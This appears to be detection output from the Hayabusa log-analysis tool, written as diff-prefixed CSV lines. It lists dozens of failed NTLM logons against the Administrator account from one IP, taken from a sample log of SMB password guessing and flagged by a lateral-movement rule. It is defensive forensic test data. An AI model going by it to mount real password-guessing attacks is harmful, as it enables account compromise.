+2016-09-20 01:50:59.071 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: F0NZjeu3lb5xddVQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.112 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YjjXBZnyWt0ljzpv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sinFBozyUR0sBadM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Au22Y0LIuvTmZDpy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QDWW3VfZ7rKayV2v  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zPgaFDZtc5wEupnq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TpYZc2TTDfJFnPHo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.434 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rYKkl1iHImW9NwKv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.489 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KxA2dh1iUMaMWOkA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.542 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sCzEzW8jDZGGZcpd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.589 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: p8510u5OsCVd94I5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2a0whHngnv7o1Bz2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Xy6cGuYgubjlXoMw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.708 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: luoXLN2XZQC0lHfu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8jdKLW96haKCHHXI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.792 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9SQSH6E1aKXu1o7T  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nOUdKa838wK1mLFw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aFmILxspIJsiEHwL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.912 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pCz7qbdSEyqxQSKm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.960 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ny3F1xPgakJK0CA7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Vi7Moaa6d12CzWhl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4fbbRVOig9bn9p5g  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.079 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qSZrfRe9d0LLkbmA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QqdZMYsbXFlrKFxk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.152 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kypdxj88trEUBEny  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9hM8fge1IrNsJNd2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SzG27JSj6iAFyiNT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hWcjuW8dU5ATLHzB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ns9lm9Nvhvi4fY6A  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.353 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aExdYPqY2eUCYZmC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: t9cnmRGdByuJlKZj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: f9RvWTFFUgCrhlkD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HC3oQUIEWqztyx6s  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TK3BOeD2w9xPB4N1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: I6yzU5WuvpmPKLSS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GFoUGsara5Pl03WP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.634 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qLaOCImeMIMlGvMj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.761 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2Vzb3pEI2ZeP2NFA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.821 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7Fa7ebH7UXd1KW4X  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wRBHXRkOa6x5KI5G  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.915 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VNVxzgOLrZzfP3cB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.944 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yCNXajRX2lIgLQuc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.992 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: x0nukf24IoalycOn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.101 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xZFZN0KfeHtyDppG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZmxqKyWU5GU1y22P  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WuRyvCfgQ4rwG3fu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3prKZt5ymouwNKnK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CWrNNn13EC1FLwLA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SfnBT5OvT5cQXHfS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RLZFPCShXoPvvThS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UsPCJ0UlfH4urYrm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MIQlOetFByLZqPkT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: c9IBZ0qTDlHWADZt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lmhkB39gKvvuT89e  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4KPoZ8JB7WSjUCHW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0mwiPq4gF1YXkQSl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.615 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Y5ncgrpwOFo7E8vg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.647 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KbkG8ezrAPFC0iKu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GW4WKkHocNadDzrb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: unbtFAiykcfKTbQT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oRzF1s9XVoRmoFQ6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9TO1c7eYd1IQHVwG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Wsn5GM4BqEl6A6pY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.900 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pq350wqwVDQlTKu9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uMJWwjG7J2sOiBYd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3YusfxQQygi2x5Cu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6q29uj6ovfwz0riC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.072 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cj38VsqGLoQ8jGdf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TOW8OIO2vQRFaTID  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.173 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DfYITdZCYwEj9IJV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.205 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4BI6V35tZGZ1WGtJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wOF75n4aunKH9qxc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
